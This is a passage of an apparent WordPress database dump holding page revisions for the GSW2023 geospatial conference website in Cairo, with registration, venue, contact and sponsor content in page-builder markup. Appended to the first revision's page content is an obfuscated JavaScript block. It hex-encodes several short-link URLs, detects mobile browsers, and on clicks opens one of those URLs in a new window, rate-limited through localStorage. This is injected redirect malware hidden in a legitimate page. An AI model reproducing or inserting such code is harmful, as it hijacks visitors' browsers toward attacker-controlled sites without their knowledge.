width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-02 19:50:58','2023-06-02 19:50:58','',3066,'https://gsw2023.com/?p=4609',0,'revision','',0),
(4610,1,'2023-06-02 20:02:54','2023-06-02 20:02:54','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter 